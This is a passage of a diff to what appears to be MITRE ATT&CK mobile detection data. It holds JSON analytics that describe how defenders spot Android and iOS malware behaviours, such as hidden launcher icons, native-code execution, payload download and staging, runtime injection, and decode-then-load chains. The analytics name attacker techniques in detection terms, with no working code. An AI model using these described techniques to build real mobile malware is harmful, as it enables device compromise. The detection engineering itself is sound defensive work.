+                            "channel": "installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between icon suppression and later runtime activity"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate apps permitted to reduce launcher visibility, such as managed agents, work-profile utilities, or system applications"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether post-suppression behavior is only suspicious when no recent foreground interaction is present"
+                        },
+                        {
+                            "field": "SuppressionMode",
+                            "description": "Environment-specific handling of hidden, disabled, or synthesized launcher behavior depending on Android version and management posture"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background maintenance"
+                        },
+                        {
+                            "field": "SensorAfterSuppressionThreshold",
+                            "description": "Threshold for sensor access frequency after launcher visibility is reduced"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-24 20:30:29.495000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4ec34db8-7214-4059-925e-bdcd58bca391",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0717#AN1847",
+                            "external_id": "AN1847"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1847",
+                    "description": "The defender correlates application loading or invoking native libraries through JNI or NDK-backed execution paths with subsequent lower-level activity such as native thread creation, sensor access, file operations, or outbound network communication that is inconsistent with the app's declared role or recent user interaction. The analytic prioritizes defender-observable control-plane effects: native library load or JNI bridge use, transition into native execution context, and immediate post-load behavior occurring from background state, locked-device state, or non-baselined app categories.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Native library load or JNI-backed execution occurs while app_state=background or device_locked=true or recent_user_interaction=false during the execution phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between native library load, JNI/native execution, and follow-on behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to use native code, such as games, media, enterprise VPN, security tools, or performance-intensive apps"
+                        },
+                        {
+                            "field": "AllowedLibraryPatterns",
+                            "description": "Expected native library names, paths, signing attributes, or packaging patterns for approved applications"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether native execution should only occur during active user-driven workflows for a given app role"
+                        },
+                        {
+                            "field": "LibraryPathPatterns",
+                            "description": "Environment-specific list of suspicious temporary, extracted, or dynamically staged native library locations"
+                        },
+                        {
+                            "field": "PostLoadBehaviorThreshold",
+                            "description": "Minimum number or severity of suspicious actions after native load required to elevate confidence"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after native execution to treat network activity as meaningful follow-on behavior"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-09 16:13:11.156000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--86aa8777-e12a-4dab-81ed-354bed18f3db",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0718#AN1848",
+                            "external_id": "AN1848"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1848",
+                    "description": "The defender correlates an application establishing outbound retrieval to a non-baselined external source with immediate local creation of a new executable, module, staged payload, overlay asset, or secondary file in app-controlled or shared storage, followed by optional load, invocation, handoff, or repeat retrieval behavior. The analytic prioritizes Android-observable effects: network download activity, DownloadManager or direct HTTP retrieval, file creation in package-specific or external paths, and execution context inconsistent with recent user interaction or the app\u2019s declared role.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Ingress transfer and local file creation occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between remote retrieval, local write, and any follow-on load or transfer completion"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to download files such as browsers, enterprise app stores, backup/sync tools, or content delivery apps"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved software distribution, CDN, MDM, and enterprise update endpoints"
+                        },
+                        {
+                            "field": "AllowedPathList",
+                            "description": "Expected local download, cache, and update paths for legitimate app behavior"
+                        },
+                        {
+                            "field": "IngressBytesThreshold",
+                            "description": "Minimum inbound transfer size consistent with a staged secondary tool or payload"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether file retrieval should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "FileTypeRiskPatterns",
+                            "description": "Environment-specific set of retrieved file classes considered suspicious such as apk, dex, jar, so, zip, html overlay, or opaque blob"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-09 15:57:30.214000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d7e3296a-9f95-4061-b3f5-0f02910745ab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0718#AN1849",
+                            "external_id": "AN1849"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1849",
+                    "description": "The defender correlates managed-app network retrieval from a non-baselined external source with immediate creation of a new local artifact, staged resource, module-like file, or opaque payload inside the app container, followed by optional dynamic loading, handoff, or repeat retrieval behavior. Because iOS offers weaker direct visibility into tool staging internals than Android in many environments, the analytic anchors first on network acquisition plus managed app identity and then strengthens confidence with file creation or process-activity effects where mobile telemetry is available.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Ingress retrieval and staging occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between remote retrieval, local staging, and any follow-on file handling"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps legitimately expected to download secondary content or updates"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved content, MDM, enterprise, and application-update endpoints"
+                        },
+                        {
+                            "field": "AllowedContainerPatterns",
+                            "description": "Expected app-container paths for legitimate downloaded assets"
+                        },
+                        {
+                            "field": "IngressBytesThreshold",
+                            "description": "Minimum inbound transfer volume consistent with secondary tool or payload retrieval"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether retrieval should happen only in active user-driven workflows"
+                        },
+                        {
+                            "field": "ArtifactRiskPatterns",
+                            "description": "Environment-specific file or content patterns considered suspicious such as staged dylib-like resources, html overlays, archives, or opaque blobs"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-09 16:02:15.040000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--dd1b3351-f8e5-480e-9e7d-f9cfbbf01409",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0719#AN1850",
+                            "external_id": "AN1850"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1850",
+                    "description": "Correlates (1) device posture changes indicating root or elevated privilege state, (2) runtime framework manipulation or injection into application processes, and (3) anomalous API behavior or suppressed security signals. The defender observes a causal chain where an application gains privileged execution context, interacts with system frameworks (e.g., ART/Zygote), and modifies expected API outputs or suppresses security-relevant signals such as permission checks, sensor access reporting, or process visibility.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Defines correlation window between root detection, runtime manipulation, and anomalous API behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of known applications that legitimately use instrumentation or debugging frameworks"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Determines whether suspicious API manipulation must occur in background to increase fidelity"
+                        },
+                        {
+                            "field": "IntegritySignalSource",
+                            "description": "Defines which attestation signals (Play Integrity, OEM attestation) are trusted in the environment"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-09 19:56:13.060000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6fb4668b-9c70-44d2-87a3-43ff2dc699f2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0720#AN1851",
+                            "external_id": "AN1851"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1851",
+                    "description": "Defender correlates a sandboxed app writing high-entropy or encoded artifacts (often in app-private or shared storage), performing decode/decompress/reassembly, then dynamically loading/execing the resulting code (DexClassLoader/JNI dlopen) or spawning a helper process. Sequence: high-entropy file writes \u2192 decode/unpack bursts \u2192 new .dex/.so/.jar creation in temp/obfuscated paths \u2192 dynamic load or shell spawn within a tight window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "android:logcat",
+                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max interval to correlate write\u2192decode\u2192load stages (e.g., 5\u201360s depending on device performance)."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Shannon entropy threshold to flag likely obfuscated blobs (e.g., \u2265 7.2)."
+                        },
+                        {
+                            "field": "SuspiciousWriteDirs",
+                            "description": "Directories to monitor (e.g., app /files, cache, /sdcard/Download). OEMs vary."
+                        },
+                        {
+                            "field": "ChunkCountThreshold",
+                            "description": "Minimum count of small sequential writes (split payload reassembly)."
+                        },
+                        {
+                            "field": "NetworkCDNAllowlist",
+                            "description": "Benign CDNs/hosts for large opaque downloads to reduce FPs."
+                        },
+                        {
+                            "field": "ExecPathRegex",
+                            "description": "Regex for newly loaded .dex/.so/.jar/temp artifacts."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background or developer mode context to suppress test noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-01-16 16:27:24.678000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--739bd746-e98b-45cb-8bc6-3c8876745b4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0720#AN1852",
+                            "external_id": "AN1852"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1852",
+                    "description": "Defender correlates a sandboxed app downloading or receiving opaque/encoded blobs, writing high-entropy content into container/tmp, performing decode/decompress/reassembly, and then executing/loaded as Mach-O or bundle (dlopen) or leveraging JIT/RWX pages to run the decoded payload. Sequence: opaque download or IPC \u2192 high-entropy writes/split-file bursts \u2192 decode/unarchive \u2192 new Mach-O/bundle in tmp \u2192 dlopen/posix_spawn or RWX region activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "iOS:unifiedlog",
+                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max interval to link write\u2192decode\u2192load/exec (e.g., 5\u201345s depending on device and iOS version)."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Entropy threshold to consider a file obfuscated/packed (e.g., \u2265 7.3)."
+                        },
+                        {
+                            "field": "SplitWriteBurstMin",
+                            "description": "Minimum count of small sequential writes to flag reassembly behaviors."
+                        },
+                        {
+                            "field": "AppContainerPaths",
+                            "description": "Container subpaths to monitor (tmp, Library/Caches, Documents) vary by policy."
+                        },
+                        {
+                            "field": "KnownGoodBundles",
+                            "description": "Allowlist of legitimate dynamically loaded bundles/plugins to reduce FPs."
+                        },
+                        {
+                            "field": "PerAppVPNAllowlist",
+                            "description": "Known enterprise services carrying opaque archives to avoid false alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-01-29 17:05:14.514000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b95bc556-c98c-459e-9327-49830ce9c77c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0721#AN1853",
+                            "external_id": "AN1853"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1853",
+                    "description": "The defender correlates the arrival, installation, or update of a trusted or expected application with a subsequent deviation in package trust characteristics, permission posture, protected-resource use, framework behavior, or network communication that is inconsistent with the known-good role of that app. The strongest Android evidence is a managed or trusted package whose first-run or post-update behavior introduces unexpected special access, sensitive sensor use, unusual background execution, privileged framework interaction, or outbound communication to destinations outside the app's baseline shortly after installation or update.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app begins background execution, persistent service activity, overlay-like behavior, or lock-state activity inconsistent with its historical baseline or expected first-run sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between install/update and subsequent runtime/network effects."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved managed or trusted applications vary by organization and device group."
+                        },
+                        {
+                            "field": "AllowedInstallerSources",
+                            "description": "Permitted installer source or app delivery mechanism differs by fleet and policy."
+                        },
+                        {
+                            "field": "AllowedSigningBaseline",
+                            "description": "Expected signing lineage, certificate relationship, or integrity metadata vary by package."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some protected-resource use is legitimate only when an app is foregrounded."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close behavior must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "Expected app destinations, CDNs, APIs, and service providers vary by app and tenant."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-17 15:44:07.335000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c8eb9196-3134-4954-9331-838556db9aa1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0721#AN1854",
+                            "external_id": "AN1854"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1854",
+                    "description": "Anchor on supervised managed-app install/update or version drift, then correlate with unexpected background activity, managed-app state changes, or egress inconsistent with the app's historical and policy baseline.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated managed app begins background activity, persistent refresh, or lock-state-adjacent activity inconsistent with expected first-run behavior, user interaction timing, or historical baseline"
+                        },
+                        {
